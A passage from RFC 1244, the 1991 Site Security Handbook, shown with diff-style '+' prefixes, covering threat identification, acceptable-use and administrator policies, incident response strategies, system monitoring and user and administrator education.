archived off-line, + backups, audit logs, databases, in transit over + communication media. + + 4. People: users, people needed to run systems. + + 5. Documentation: on programs, hardware, systems, local + administrative procedures. + + 6. Supplies: paper, forms, ribbons, magnetic media. + + + + + + +Site Security Policy Handbook Working Group [Page 11] + +RFC 1244 Site Security Handbook July 1991 + + + 2.2.3 Identifying the Threats + + Once the assets requiring protection are identified, it is + necessary to identify threats to those assests. The threats can + then be examined to determine what potential for loss exists. It + helps to consider from what threats you are trying to protect your + assets. + + The following sections describe a few of the possible threats. + + 2.2.3.1 Unauthorized Access + + A common threat that concerns many sites is unauthorized access + to computing facilities. Unauthorized access takes many forms. + One means of unauthorized access is the use of another user's + account to gain access to a system. The use of any computer + resource without prior permission may be considered + unauthorized access to computing facilities. + + The seriousness of an unauthorized access will vary from site + to site. For some sites, the mere act of granting access to an + unauthorized user may cause irreparable harm by negative media + coverage. For other sites, an unauthorized access opens the + door to other security threats. In addition, some sites may be + more frequent targets than others; hence the risk from + unauthorized access will vary from site to site. The Computer + Emergency Response Team (CERT - see section 3.9.7.3.1) has + observed that well-known universities, government sites, and + military sites seem to attract more intruders. + + 2.2.3.2 Disclosure of Information + + Another common threat is disclosure of information. Determine + the value or sensitivity of the information stored on your + computers. Disclosure of a password file might allow for + future unauthorized accesses. A glimpse of a proposal may give + a competitor an unfair advantage. A technical paper may + contain years of valuable research. + + 2.2.3.3 Denial of Service + + Computers and networks provide valuable services to their + users. Many people rely on these services in order to perform + their jobs efficiently. When these services are not available + when called upon, a loss in productivity results. + + Denial of service comes in many forms and might affect users in + a number of ways. A network may be rendered unusable by a + + + +Site Security Policy Handbook Working Group [Page 12] + +RFC 1244 Site Security Handbook July 1991 + + + rogue packet, jamming, or by a disabled network component. A + virus might slow down or cripple a computer system. Each site + should determine which services are essential, and for each of + these services determine the affect to the site if that service + were to become disabled. + +2.3 Policy Issues + + There are a number of issues that must be addressed when developing a + security policy. These are: + + 1. Who is allowed to use the resources? + 2. What is the proper use of the resources? + 3. Who is authorized to grant access and approve usage? + 4. Who may have system administration privileges? + 5. What are the user's rights and responsibilities? + 6. What are the rights and responsibilities of the + system administrator vs. those of the user? + 7. What do you do with sensitive information? + + These issues will be discussed below. In addition you may wish to + include a section in your policy concerning ethical use of computing + resources. Parker, Swope and Baker [17, PARKER90] and Forester and + Morrison [18, FORESTER] are two useful references that address + ethical issues. + + 2.3.1 Who is Allowed to use the Resources? + + One step you must take in developing your security policy is + defining who is allowed to use your system and services. The + policy should explicitly state who is authorized to use what + resources. + + 2.3.2 What is the Proper Use of the Resources? + + After determining who is allowed access to system resources it is + necessary to provide guidelines for the acceptable use of the + resources. You may have different guidelines for different types + of users (i.e., students, faculty, external users). The policy + should state what is acceptable use as well as unacceptable use. + It should also include types of use that may be restricted. + + Define limits to access and authority. You will need to consider + the level of access various users will have and what resources + will be available or restricted to various groups of people. + + Your acceptable use policy should clearly state that individual + users are responsible for their actions. Their responsibility + + + +Site Security Policy Handbook Working Group [Page 13] + +RFC 1244 Site Security Handbook July 1991 + + + exists regardless of the security mechanisms that are in place. + It should be clearly stated that breaking into accounts or + bypassing security is not permitted. + + The following points should be covered when developing an + acceptable use policy: + + o Is breaking into accounts permitted? + o Is cracking passwords permitted? + o Is disrupting service permitted? + o Should users assume that a file being world-readable + grants them the authorization to read it? + o Should users be permitted to modify files that are + not their own even if they happen to have write + permission? + o Should users share accounts? + + The answer to most of these questions will be "no". + + You may wish to incorporate a statement in your policies + concerning copyrighted and licensed software. Licensing + agreements with vendors may require some sort of effort on your + part to ensure that the license is not violated. In addition, you + may wish to inform users that the copying of copyrighted software + may be a violation of the copyright laws, and is not permitted. + + Specifically concerning copyrighted and/or licensed software, you + may wish to include the following information: + + o Copyrighted and licensed software may not be duplicated + unless it is explicitly stated that you may do so. + o Methods of conveying information on the + copyright/licensed status of software. + o When in doubt, DON'T COPY. + + Your acceptable use policy is very important. A policy which does + not clearly state what is not permitted may leave you unable to + prove that a user violated policy. + + There are exception cases like tiger teams and users or + administrators wishing for "licenses to hack" -- you may face the + situation where users will want to "hack" on your services for + security research purposes. You should develop a policy that will + determine whether you will permit this type of research on your + services and if so, what your guidelines for such research will + be. + + Points you may wish to cover in this area: + + + +Site Security Policy Handbook Working Group [Page 14] + +RFC 1244 Site Security Handbook July 1991 + + + o Whether it is permitted at all. + o What type of activity is permitted: breaking in, releasing + worms, releasing viruses, etc.. + o What type of controls must be in place to ensure that it + does not get out of control (e.g., separate a segment of + your network for these tests). + o How you will protect other users from being victims of + these activities, including external users and networks. + o The process for obtaining permission to conduct these + tests. + + In cases where you do permit these activities, you should isolate + the portions of the network that are being tested from your main + network. Worms and viruses should never be released on a live + network. + + You may also wish to employ, contract, or otherwise solicit one or + more people or organizations to evaluate the security of your + services, of which may include "hacking". You may wish to provide + for this in your policy. + + 2.3.3 Who Is Authorized to Grant Access and Approve Usage? + + Your policy should state who is authorized to grant access to your + services. Further, it must be determined what type of access they + are permitted to give. If you do not have control over who is + granted access to your system, you will not have control over who + is using your system. Controlling who has the authorization to + grant access will also enable you to know who was or was not + granting access if problems develop later. + + There are many schemes that can be developed to control the + distribution of access to your services. The following are the + factors that you must consider when determining who will + distribute access to your services: + + o Will you be distributing access from a centralized + point or at various points? + + You can have a centralized distribution point to a distributed + system where various sites or departments independently authorize + access. The trade off is between security and convenience. The + more centralized, the easier to secure. + + o What methods will you use for creating accounts and + terminating access? + + From a security standpoint, you need to examine the mechanism that + + + +Site Security Policy Handbook Working Group [Page 15] + +RFC 1244 Site Security Handbook July 1991 + + + you will be using to create accounts. In the least restrictive + case, the people who are authorized to grant access would be able + to go into the system directly and create an account by hand or + through vendor supplied mechanisms. Generally, these mechanisms + place a great deal of trust in the person running them, and the + person running them usually has a large amount of privileges. If + this is the choice you make, you need to select someone who is + trustworthy to perform this task. The opposite solution is to + have an integrated system that the people authorized to create + accounts run, or the users themselves may actually run. Be aware + that even in the restrictive case of having a mechanized facility + to create accounts does not remove the potential for abuse. + + You should have specific procedures developed for the creation of + accounts. These procedures should be well documented to prevent + confusion and reduce mistakes. A security vulnerability in the + account authorization process is not only possible through abuse, + but is also possible if a mistake is made. Having clear and well + documented procedure will help ensure that these mistakes won't + happen. You should also be sure that the people who will be + following these procedures understand them. + + The granting of access to users is one of the most vulnerable of + times. You should ensure that the selection of an initial + password cannot be easily guessed. You should avoid using an + initial password that is a function of the username, is part of + the user's name, or some algorithmically generated password that + can easily be guessed. In addition, you should not permit users + to continue to use the initial password indefinitely. If + possible, you should force users to change the initial password + the first time they login. Consider that some users may never + even login, leaving their password vulnerable indefinitely. Some + sites choose to disable accounts that have never been accessed, + and force the owner to reauthorize opening the account. + + 2.3.4 Who May Have System Administration Privileges? + + One security decision that needs to be made very carefully is who + will have access to system administrator privileges and passwords + for your services. Obviously, the system administrators will need + access, but inevitably other users will request special + privileges. The policy should address this issue. Restricting + privileges is one way to deal with threats from local users. The + challenge is to balance restricting access to these to protect + security with giving people who need these privileges access so + that they can perform their tasks. One approach that can be taken + is to grant only enough privilege to accomplish the necessary + tasks. + + + +Site Security Policy Handbook Working Group [Page 16] + +RFC 1244 Site Security Handbook July 1991 + + + Additionally, people holding special privileges should be + accountable to some authority and this should also be identified + within the site's security policy. If the people you grant + privileges to are not accountable, you run the risk of losing + control of your system and will have difficulty managing a + compromise in security. + + 2.3.5 What Are The Users' Rights and Responsibilities? + + The policy should incorporate a statement on the users' rights and + responsibilities concerning the use of the site's computer systems + and services. It should be clearly stated that users are + responsible for understanding and respecting the security rules of + the systems they are using. The following is a list of topics + that you may wish to cover in this area of the policy: + + o What guidelines you have regarding resource consumption + (whether users are restricted, and if so, what the + restrictions are). + o What might constitute abuse in terms of system performance. + o Whether users are permitted to share accounts or let others + use their accounts. + o How "secret" users should keep their passwords. + o How often users should change their passwords and any other + password restrictions or requirements. + o Whether you provide backups or expect the users to create + their own. + o Disclosure of information that may be proprietary. + o Statement on Electronic Mail Privacy (Electronic + Communications Privacy Act). + o Your policy concerning controversial mail or postings to + mailing lists or discussion groups (obscenity, harassment, + etc.). + o Policy on electronic communications: mail forging, etc. + + The Electronic Mail Association sponsored a white paper on the + privacy of electronic mail in companies [4]. Their basic + recommendation is that every site should have a policy on the + protection of employee privacy. They also recommend that + organizations establish privacy policies that deal with all media, + rather than singling out electronic mail. + + They suggest five criteria for evaluating any policy: + + 1. Does the policy comply with law and with duties to + third parties? + + 2. Does the policy unnecessarily compromise the interest of + + + +Site Security Policy Handbook Working Group [Page 17] + +RFC 1244 Site Security Handbook July 1991 + + + the employee, the employer or third parties? + + 3. Is the policy workable as a practical matter and likely to + be enforced? + + 4. Does the policy deal appropriately with all different + forms of communications and record keeping with the office? + + 5. Has the policy been announced in advance and agreed to by + all concerned? + + 2.3.6 What Are The Rights and Responsibilities of System + Administrators Versus Rights of Users + + There is a tradeoff between a user's right to absolute privacy and + the need of system administrators to gather sufficient information + to diagnose problems. There is also a distinction between a + system administrator's need to gather information to diagnose + problems and investigating security violations. The policy should + specify to what degree system administrators can examine user + files to diagnose problems or for other purposes, and what rights + you grant to the users. You may also wish to make a statement + concerning system administrators' obligation to maintaining the + privacy of information viewed under these circumstances. A few + questions that should be answered are: + + o Can an administrator monitor or read a user's files + for any reason? + o What are the liabilities? + o Do network administrators have the right to examine + network or host traffic? + + 2.3.7 What To Do With Sensitive Information + + Before granting users access to your services, you need to + determine at what level you will provide for the security of data + on your systems. By determining this, you are determining the + level of sensitivity of data that users should store on your + systems. You do not want users to store very sensitive + information on a system that you are not going to secure very + well. You need to tell users who might store sensitive + information what services, if any, are appropriate for the storage + of sensitive information. This part should include storing of + data in different ways (disk, magnetic tape, file servers, etc.). + Your policy in this area needs to be coordinated with the policy + concerning the rights of system administrators versus users (see + section 2.3.6). + + + + +Site Security Policy Handbook Working Group [Page 18] + +RFC 1244 Site Security Handbook July 1991 + + +2.4 What Happens When the Policy is Violated + + It is obvious that when any type of official policy is defined, be it + related to computer security or not, it will eventually be broken. + The violation may occur due to an individual's negligence, accidental + mistake, having not been properly informed of the current policy, or + not understanding the current policy. It is equally possible that an + individual (or group of individuals) may knowingly perform an act + that is in direct violation of the defined policy. + + When a policy violation has been detected, the immediate course of + action should be pre-defined to ensure prompt and proper enforcement. + An investigation should be performed to determine how and why the + violation occurred. Then the appropriate corrective action should be + executed. The type and severity of action taken varies depending on + the type of violation that occurred. + + 2.4.1 Determining the Response to Policy Violations + + Violations to policy may be committed by a wide variety of users. + Some may be local users and others may be from outside the local + environment. Sites may find it helpful to define what it + considers "insiders" and "outsiders" based upon administrative, + legal or political boundaries. These boundaries imply what type + of action must be taken to correct the offending party; from a + written reprimand to pressing legal charges. So, not only do you + need to define actions based on the type of violation, you also + need to have a clearly defined series of actions based on the kind + of user violating your computer security policy. This all seems + rather complicated, but should be addressed long before it becomes + necessary as the result of a violation. + + One point to remember about your policy is that proper education + is your best defense. For the outsiders who are using your + computer legally, it is your responsibility to verify that these + individuals are aware of the policies that you have set forth. + Having this proof may assist you in the future if legal action + becomes necessary. + + As for users who are using your computer illegally, the problem is + basically the same. What type of user violated the policy and how + and why did they do it? Depending on the results of your + investigation, you may just prefer to "plug" the hole in your + computer security and chalk it up to experience. Or if a + significant amount of loss was incurred, you may wish to take more + drastic action. + + + + + +Site Security Policy Handbook Working Group [Page 19] + +RFC 1244 Site Security Handbook July 1991 + + + 2.4.2 What to do When Local Users Violate the Policy of a Remote + Site + + In the event that a local user violates the security policy of a + remote site, the local site should have a clearly defined set of + administrative actions to take concerning that local user. The + site should also be prepared to protect itself against possible + actions by the remote site. These situations involve legal issues + which should be addressed when forming the security policy. + + 2.4.3 Defining Contacts and Responsibilities to Outside + Organizations + + The local security policy should include procedures for + interaction with outside organizations. These include law + enforcement agencies, other sites, external response team + organizations (e.g., the CERT, CIAC) and various press agencies. + The procedure should state who is authorized to make such contact + and how it should be handled. Some questions to be answered + include: + + o Who may talk to the press? + o When do you contact law enforcement and investigative agencies? + o If a connection is made from a remote site, is the + system manager authorized to contact that site? + o Can data be released? What kind? + + Detailed contact information should be readily available along + with clearly defined procedures to follow. + + 2.4.4 What are the Responsibilities to our Neighbors and Other + Internet Sites? + + The Security Policy Working Group within the IETF is working on a + document entitled, "Policy Guidelines for the Secure Operation of + the Internet" [23]. It addresses the issue that the Internet is a + cooperative venture and that sites are expected to provide mutual + security assistance. This should be addressed when developing a + site's policy. The major issue to be determined is how much + information should be released. This will vary from site to site + according to the type of site (e.g., military, education, + commercial) as well as the type of security violation that + occurred. + + 2.4.5 Issues for Incident Handling Procedures + + Along with statements of policy, the document being prepared + should include procedures for incident handling. This is covered + + + +Site Security Policy Handbook Working Group [Page 20] + +RFC 1244 Site Security Handbook July 1991 + + + in detail in the next chapter. There should be procedures + available that cover all facets of policy violation. + +2.5 Locking In or Out + + Whenever a site suffers an incident which may compromise computer + security, the strategies for reacting may be influenced by two + opposing pressures. + + If management fears that the site is sufficiently vulnerable, it may + choose a "Protect and Proceed" strategy. This approach will have as + its primary goal the protection and preservation of the site + facilities and to provide for normalcy for its users as quickly as + possible. Attempts will be made to actively interfere with the + intruder's processes, prevent further access and begin immediate + damage assessment and recovery. This process may involve shutting + down the facilities, closing off access to the network, or other + drastic measures. The drawback is that unless the intruder is + identified directly, they may come back into the site via a different + path, or may attack another site. + + The alternate approach, "Pursue and Prosecute", adopts the opposite + philosophy and goals. The primary goal is to allow intruders to + continue their activities at the site until the site can identify the + responsible persons. This approach is endorsed by law enforcement + agencies and prosecutors. The drawback is that the agencies cannot + exempt a site from possible user lawsuits if damage is done to their + systems and data. + + Prosecution is not the only outcome possible if the intruder is + identified. If the culprit is an employee or a student, the + organization may choose to take disciplinary actions. The computer + security policy needs to spell out the choices and how they will be + selected if an intruder is caught. + + Careful consideration must be made by site management regarding their + approach to this issue before the problem occurs. The strategy + adopted might depend upon each circumstance. Or there may be a + global policy which mandates one approach in all circumstances. The + pros and cons must be examined thoroughly and the users of the + facilities must be made aware of the policy so that they understand + their vulnerabilities no matter which approach is taken. + + The following are checklists to help a site determine which strategy + to adopt: "Protect and Proceed" or "Pursue and Prosecute". + + + + + + +Site Security Policy Handbook Working Group [Page 21] + +RFC 1244 Site Security Handbook July 1991 + + + Protect and Proceed + + 1. If assets are not well protected. + + 2. If continued penetration could result in great + financial risk. + + 3. If the possibility or willingness to prosecute + is not present. + + 4. If user base is unknown. + + 5. If users are unsophisticated and their work is + vulnerable. + + 6. If the site is vulnerable to lawsuits from users, e.g., + if their resources are undermined. + + Pursue and Prosecute + + 1. If assets and systems are well protected. + + 2. If good backups are available. + + 3. If the risk to the assets is outweighed by the + disruption caused by the present and possibly future + penetrations. + + 4. If this is a concentrated attack occurring with great + frequency and intensity. + + 5. If the site has a natural attraction to intruders, and + consequently regularly attracts intruders. + + 6. If the site is willing to incur the financial (or other) + risk to assets by allowing the penetrator continue. + + 7. If intruder access can be controlled. + + 8. If the monitoring tools are sufficiently well-developed + to make the pursuit worthwhile. + + 9. If the support staff is sufficiently clever and knowledgable + about the operating system, related utilities, and systems + to make the pursuit worthwhile. + + 10. If there is willingness on the part of management to + prosecute. + + + +Site Security Policy Handbook Working Group [Page 22] + +RFC 1244 Site Security Handbook July 1991 + + + 11. If the system adminitrators know in general what kind of + evidence would lead to prosecution. + + 12. If there is established contact with knowledgeable law + enforcement. + + 13. If there is a site representative versed in the relevant + legal issues. + + 14. If the site is prepared for possible legal action from + its own users if their data or systems become compromised + during the pursuit. + +2.6 Interpreting the Policy + + It is important to define who will interpret the policy. This could + be an individual or a committee. No matter how well written, the + policy will require interpretation from time to time and this body + would serve to review, interpret, and revise the policy as needed. + +2.7 Publicizing the Policy + + Once the site security policy has been written and established, a + vigorous process should be engaged to ensure that the policy + statement is widely and thoroughly disseminated and discussed. A + mailing of the policy should not be considered sufficient. A period + for comments should be allowed before the policy becomes effective to + ensure that all affected users have a chance to state their reactions + and discuss any unforeseen ramifications. Ideally, the policy should + strike a balance between protection and productivity. + + Meetings should be held to elicit these comments, and also to ensure + that the policy is correctly understood. (Policy promulgators are + not necessarily noted for their skill with the language.) These + meetings should involve higher management as well as line employees. + Security is a collective effort. + + In addition to the initial efforts to publicize the policy, it is + essential for the site to maintain a continual awareness of its + computer security policy. Current users may need periodic reminders + New users should have the policy included as part of their site + introduction packet. As a condition for using the site facilities, + it may be advisable to have them sign a statement that they have read + and understood the policy. Should any of these users require legal + action for serious policy violations, this signed statement might + prove to be a valuable aid. + + + + + +Site Security Policy Handbook Working Group [Page 23] + +RFC 1244 Site Security Handbook July 1991 + + +3. Establishing Procedures to Prevent Security Problems + + The security policy defines what needs to be protected. This section + discusses security procedures which specify what steps will be used + to carry out the security policy. + +3.1 Security Policy Defines What Needs to be Protected + + The security policy defines the WHAT's: what needs to be protected, + what is most important, what the priorities are, and what the general + approach to dealing with security problems should be. + + The security policy by itself doesn't say HOW things are protected. + That is the role of security procedures, which this section + discusses. The security policy should be a high level document, + giving general strategy. The security procedures need to set out, in + detail, the precise steps your site will take to protect itself. + + The security policy should include a general risk assessment of the + types of threats a site is mostly likely to face and the consequences + of those threats (see section 2.2). Part of doing a risk assessment + will include creating a general list of assets that should be + protected (section 2.2.2). This information is critical in devising + cost-effective procedures. + + It is often tempting to start creating security procedures by + deciding on different mechanisms first: "our site should have logging + on all hosts, call-back modems, and smart cards for all users." This + approach could lead to some areas that have too much protection for + the risk they face, and other areas that aren't protected enough. + Starting with the security policy and the risks it outlines should + ensure that the procedures provide the right level of protect for all + assets. + +3.2 Identifing Possible Problems + + To determine risk, vulnerabilities must be identified. Part of the + purpose of the policy is to aid in shoring up the vulnerabilities and + thus to decrease the risk in as many areas as possible. Several of + the more popular problem areas are presented in sections below. This + list is by no means complete. In addition, each site is likely to + have a few unique vulnerabilities. + + 3.2.1 Access Points + + Access points are typically used for entry by unauthorized users. + Having many access points increases the risk of access to an + organization's computer and network facilities. + + + +Site Security Policy Handbook Working Group [Page 24] + +RFC 1244 Site Security Handbook July 1991 + + + Network links to networks outside the organization allow access + into the organization for all others connected to that external + network. A network link typically provides access to a large + number of network services, and each service has a potential to be + compromised. + + Dialup lines, depending on their configuration, may provide access + merely to a login port of a single system. If connected to a + terminal server, the dialup line may give access to the entire + network. + + Terminal servers themselves can be a source of problem. Many + terminal servers do not require any kind of authentication. + Intruders often use terminal servers to disguise their actions, + dialing in on a local phone and then using the terminal server to + go out to the local network. Some terminal servers are configured + so that intruders can TELNET [19] in from outside the network, and + then TELNET back out again, again serving to make it difficult to + trace them. + + 3.2.2 Misconfigured Systems + + Misconfigured systems form a large percentage of security holes. + Today's operating systems and their associated software have + become so complex that understanding how the system works has + become a full-time job. Often, systems managers will be non- + specialists chosen from the current organization's staff. + + Vendors are also partly responsible for misconfigured systems. To + make the system installation process easier, vendors occasionally + choose initial configurations that are not secure in all + environments. + + 3.2.3 Software Bugs + + Software will never be bug free. Publicly known security bugs are + common methods of unauthorized entry. Part of the solution to + this problem is to be aware of the security problems and to update + the software when problems are detected. When bugs are found, + they should be reported to the vendor so that a solution to the + problem can be implemented and distributed. + + 3.2.4 "Insider" Threats + + An insider to the organization may be a considerable threat to the + security of the computer systems. Insiders often have direct + access to the computer and network hardware components. The + ability to access the components of a system makes most systems + + + +Site Security Policy Handbook Working Group [Page 25] + +RFC 1244 Site Security Handbook July 1991 + + + easier to compromise. Most desktop workstations can be easily + manipulated so that they grant privileged access. Access to a + local area network provides the ability to view possibly sensitive + data traversing the network. + +3.3 Choose Controls to Protect Assets in a Cost-Effective Way + + After establishing what is to be protected, and assessing the risks + these assets face, it is necessary to decide how to implement the + controls which protect these assets. The controls and protection + mechanisms should be selected in a way so as to adequately counter + the threats found during risk assessment, and to implement those + controls in a cost effective manner. It makes little sense to spend + an exorbitant sum of money and overly constrict the user base if the + risk of exposure is very small. + + 3.3.1 Choose the Right Set of Controls + + The controls that are selected represent the physical embodiment + of your security policy. They are the first and primary line of + defense in the protection of your assets. It is therefore most + important to ensure that the controls that you select are the + right set of controls. If the major threat to your system is + outside penetrators, it probably doesn't make much sense to use + biometric devices to authenticate your regular system users. On + the other hand, if the major threat is unauthorized use of + computing resources by regular system users, you'll probably want + to establish very rigorous automated accounting procedures. + + 3.3.2 Use Common Sense + + Common sense is the most appropriate tool that can be used to + establish your security policy. Elaborate security schemes and + mechanisms are impressive, and they do have their place, yet there + is little point in investing money and time on an elaborate + implementation scheme if the simple controls are forgotten. For + example, no matter how elaborate a system you put into place on + top of existing security controls, a single user with a poor + password can still leave your system open to attack. + +3.4 Use Multiple Strategies to Protect Assets + + Another method of protecting assets is to use multiple strategies. + In this way, if one strategy fails or is circumvented, another + strategy comes into play to continue protecting the asset. By using + several simpler strategies, a system can often be made more secure + than if one very sophisticated method were used in its place. For + example, dial-back modems can be used in conjunction with traditional + + + +Site Security Policy Handbook Working Group [Page 26] + +RFC 1244 Site Security Handbook July 1991 + + + logon mechanisms. Many similar approaches could be devised that + provide several levels of protection for assets. However, it's very + easy to go overboard with extra mechanisms. One must keep in mind + exactly what it is that needs to be protected. + +3.5 Physical Security + + It is a given in computer security if the system itself is not + physically secure, nothing else about the system can be considered + secure. With physical access to a machine, an intruder can halt the + machine, bring it back up in privileged mode, replace or alter the + disk, plant Trojan horse programs (see section 2.13.9.2), or take any + number of other undesirable (and hard to prevent) actions. + + Critical communications links, important servers, and other key + machines should be located in physically secure areas. Some security + systems (such as Kerberos) require that the machine be physically + secure. + + If you cannot physically secure machines, care should be taken about + trusting those machines. Sites should consider limiting access from + non-secure machines to more secure machines. In particular, allowing + trusted access (e.g., the BSD Unix remote commands such as rsh) from + these kinds of hosts is particularly risky. + + For machines that seem or are intended to be physically secure, care + should be taken about who has access to the machines. Remember that + custodial and maintenance staff often have keys to rooms. + +3.6 Procedures to Recognize Unauthorized Activity + + Several simple procedures can be used to detect most unauthorized + uses of a computer system. These procedures use tools provided with + the operating system by the vendor, or tools publicly available from + other sources. + + 3.6.1 Monitoring System Use + + System monitoring can be done either by a system administrator, or + by software written for the purpose. Monitoring a system involves + looking at several parts of the system and searching for anything + unusual. Some of the easier ways to do this are described in this + section. + + The most important thing about monitoring system use is that it be + done on a regular basis. Picking one day out of the month to + monitor the system is pointless, since a security breach can be + isolated to a matter of hours. Only by maintaining a constant + + + +Site Security Policy Handbook Working Group [Page 27] + +RFC 1244 Site Security Handbook July 1991 + + + vigil can you expect to detect security violations in time to + react to them. + + 3.6.2 Tools for Monitoring the System + + This section describes tools and methods for monitoring a system + against unauthorized access and use. + + 3.6.2.1 Logging + + Most operating systems store numerous bits of information in + log files. Examination of these log files on a regular basis + is often the first line of defense in detecting unauthorized + use of the system. + + - Compare lists of currently logged in users and past + login histories. Most users typically log in and out + at roughly the same time each day. An account logged + in outside the "normal" time for the account may be in + use by an intruder. + + - Many systems maintain accounting records for billing + purposes. These records can also be used to determine + usage patterns for the system; unusual accounting records + may indicate unauthorized use of the system. + + - System logging facilities, such as the UNIX "syslog" + utility, should be checked for unusual error messages + from system software. For example, a large number of + failed login attempts in a short period of time may + indicate someone trying to guess passwords. + + - Operating system commands which list currently executing + processes can be used to detect users running programs + they are not authorized to use, as well as to detect + unauthorized programs which have been started by an + intruder. + + 3.6.2.2 Monitoring Software + + Other monitoring tools can easily be constructed using standard + operating system software, by using several, often unrelated, + programs together. For example, checklists of file ownerships + and permission settings can be constructed (for example, with + "ls" and "find" on UNIX) and stored off-line. These lists can + then be reconstructed periodically and compared against the + master checklist (on UNIX, by using the "diff" utility). + Differences may indicate that unauthorized modifications have + + + +Site Security Policy Handbook Working Group [Page 28] + +RFC 1244 Site Security Handbook July 1991 + + + been made to the system. + + Still other tools are available from third-party vendors and + public software distribution sites. Section 3.9.9 lists + several sources from which you can learn what tools are + available and how to get them. + + 3.6.2.3 Other Tools + + Other tools can also be used to monitor systems for security + violations, although this is not their primary purpose. For + example, network monitors can be used to detect and log + connections from unknown sites. + + 3.6.3 Vary the Monitoring Schedule + + The task of system monitoring is not as daunting as it may seem. + System administrators can execute many of the commands used for + monitoring periodically throughout the day during idle moments + (e.g., while talking on the telephone), rather than spending fixed + periods of each day monitoring the system. By executing the + commands frequently, you will rapidly become used to seeing + "normal" output, and will easily spot things which are out of the + ordinary. In addition, by running various monitoring commands at + different times throughout the day, you make it hard for an + intruder to predict your actions. For example, if an intruder + knows that each day at 5:00 p.m. the system is checked to see that + everyone has logged off, he will simply wait until after the check + has completed before logging in. But the intruder cannot guess + when a system administrator might type a command to display all + logged-in users, and thus he runs a much greater risk of + detection. + + Despite the advantages that regular system monitoring provides, + some intruders will be aware of the standard logging mechanisms in + use on systems they are attacking. They will actively pursue and + attempt to disable monitoring mechanisms. Regular monitoring + therefore is useful in detecting intruders, but does not provide + any guarantee that your system is secure, nor should monitoring be + considered an infallible method of detecting unauthorized use. + +3.7 Define Actions to Take When Unauthorized Activity is Suspected + + Sections 2.4 and 2.5 discussed the course of action a site should + take when it suspects its systems are being abused. The computer + security policy should state the general approach towards dealing + with these problems. + + + + +Site Security Policy Handbook Working Group [Page 29] + +RFC 1244 Site Security Handbook July 1991 + + + The procedures for dealing with these types of problems should be + written down. Who has authority to decide what actions will be + taken? Should law enforcement be involved? Should your + organization cooperate with other sites in trying to track down an + intruder? Answers to all the questions in section 2.4 should be + part of the incident handling procedures. + + Whether you decide to lock out or pursue intruders, you should + have tools and procedures ready to apply. It is best to work up + these tools and procedures before you need them. Don't wait until + an intruder is on your system to figure out how to track the + intruder's actions; you will be busy enough if an intruder + strikes. + +3.8 Communicating Security Policy + + Security policies, in order to be effective, must be communicated to + both the users of the system and the system maintainers. This + section describes what these people should be told, and how to tell + them. + + 3.8.1 Educating the Users + + Users should be made aware of how the computer systems are + expected to be used, and how to protect themselves from + unauthorized users. + + 3.8.1.1 Proper Account/Workstation Use + + All users should be informed about what is considered the + "proper" use of their account or workstation ("proper" use is + discussed in section 2.3.2). This can most easily be done at + the time a user receives their account, by giving them a policy + statement. Proper use policies typically dictate things such + as whether or not the account or workstation may be used for + personal activities (such as checkbook balancing or letter + writing), whether profit-making activities are allowed, whether + game playing is permitted, and so on. These policy statements + may also be used to summarize how the computer facility is + licensed and what software licenses are held by the + institution; for example, many universities have educational + licenses which explicitly prohibit commercial uses of the + system. A more complete list of items to consider when writing + a policy statement is given in section 2.3. + + 3.8.1.2 Account/Workstation Management Procedures + + Each user should be told how to properly manage their account + + + +Site Security Policy Handbook Working Group [Page 30] + +RFC 1244 Site Security Handbook July 1991 + + + and workstation. This includes explaining how to protect files + stored on the system, how to log out or lock the terminal or + workstation, and so on. Much of this information is typically + covered in the "beginning user" documentation provided by the + operating system vendor, although many sites elect to + supplement this material with local information. + + If your site offers dial-up modem access to the computer + systems, special care must be taken to inform users of the + security problems inherent in providing this access. Issues + such as making sure to log out before hanging up the modem + should be covered when the user is initially given dial-up + access. + + Likewise, access to the systems via local and wide-area + networks presents its own set of security problems which users + should be made aware of. Files which grant "trusted host" or + "trusted user" status to remote systems and users should be + carefully explained. + + 3.8.1.3 Determining Account Misuse + + Users should be told how to detect unauthorized access to their + account. If the system prints the last login time when a user + logs in, he or she should be told to check that time and note + whether or not it agrees with the last time he or she actually + logged in. + + Command interpreters on some systems (e.g., the UNIX C shell) + maintain histories of the last several commands executed. + Users should check these histories to be sure someone has not + executed other commands with their account. + + 3.8.1.4 Problem Reporting Procedures + + A procedure should be developed to enable users to report + suspected misuse of their accounts or other misuse they may + have noticed. This can be done either by providing the name + and telephone number of a system administrator who manages + security of the computer system, or by creating an electronic + mail address (e.g., "security") to which users can address + their problems. + + 3.8.2 Educating the Host Administrators + + In many organizations, computer systems are administered by a wide + variety of people. These administrators must know how to protect + their own systems from attack and unauthorized use, as well as how + + + +Site Security Policy Handbook Working Group [Page 31] + +RFC 1244 Site Security Handbook July 1991 + + + to communicate successful penetration of their systems to other + administrators as a warning. + + 3.8.2.1 Account Management Procedures + + Care must be taken when installing accounts on the system in + order to make them secure. When installing a system from + distribution media, the password file should be examined for + "standard" accounts provided by the vendor. Many vendors + provide accounts for use by system services or field service + personnel. These accounts typically have either no password or + one which is common knowledge. These accounts should be given + new passwords if they are needed, or disabled or deleted from + the system if they are not. + + Accounts without passwords are generally very dangerous since + they allow anyone to access the system. Even accounts which do + not execute a command interpreter (e.g., accounts which exist + only to see who is logged in to the system) can be compromised + if set up incorrectly. A related concept, that of "anonymous" + file transfer (FTP) [20], allows users from all over the + network to access your system to retrieve files from (usually) + a protected disk area. You should carefully weigh the benefits + that an account without a password provides against the + security risks of providing such access to your system. + + If the operating system provides a "shadow" password facility + which stores passwords in a separate file accessible only to + privileged users, this facility should be used. System V UNIX, + SunOS 4.0 and above, and versions of Berkeley UNIX after 4.3BSD + Tahoe, as well as others, provide this feature. It protects + passwords by hiding their encrypted values from unprivileged + users. This prevents an attacker from copying your password + file to his or her machine and then attempting to break the + passwords at his or her leisure. + + Keep track of who has access to privileged user accounts (e.g., + "root" on UNIX or "MAINT" on VMS). Whenever a privileged user + leaves the organization or no longer has need of the privileged + account, the passwords on all privileged accounts should be + changed. + + 3.8.2.2 Configuration Management Procedures + + When installing a system from the distribution media or when + installing third-party software, it is important to check the + installation carefully. Many installation procedures assume a + "trusted" site, and hence will install files with world write + + + +Site Security Policy Handbook Working Group [Page 32] + +RFC 1244 Site Security Handbook July 1991 + + + permission enabled, or otherwise compromise the security of + files. + + Network services should also be examined carefully when first + installed. Many vendors provide default network permission + files which imply that all outside hosts are to be "trusted", + which is rarely the case when connected to wide-area networks + such as the Internet. + + Many intruders collect information on the vulnerabilities of + particular system versions. The older a system, the more + likely it is that there are security problems in that version + which have since been fixed by the vendor in a later release. + For this reason, it is important to weigh the risks of not + upgrading to a new operating system release (thus leaving + security holes 